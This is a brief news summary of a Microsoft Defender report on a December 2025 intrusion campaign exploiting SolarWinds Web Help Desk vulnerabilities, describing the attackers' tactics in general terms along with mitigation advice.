THE Microsoft Defender Security Research Team reports a multi‑stage intrusion in which threat actors exploited internet‑exposed SolarWinds Web Help Desk (WHD) instances to gain an initial foothold and later move laterally toward high‑value assets. They note that attacks occurred in December 2025 and involved hosts vulnerable to both the new and old CVEs, but they have not yet confirmed which CVE was used for initial access, with CVE‑2025‑40551, CVE‑2025‑40536 and CVE‑2025‑26399 referenced as possible.
The researchers describe a pattern where a single exposed application can lead to full domain compromise when unpatched or poorly monitored, with living‑off‑the‑land techniques and low‑noise persistence observed, including DLL sideloading via wab[.]exe and the use of legitimate tools.
Successful exploitation allowed unauthenticated remote code execution, after which the attackers spawned PowerShell, used BITS for payload download, and, in some cases, installed components of Zoho ManageEngine for interactive control. They also detail credential access and lateral movement through actions such as DCSync, and persistence mechanisms like reverse SSH and RDP, as well as a scheduled task to launch a QEMU VM to hide activity while exposing SSH via port forwarding.
Mitigation guidance emphasises patching and restricting exposure to WHD CVEs, evicting unauthorized RMM artefacts, rotating credentials, and increasing logging and monitoring across identity, endpoint and network layers, with Defender XDR detections and hunting queries provided for post‑breach and pre‑breach coverage.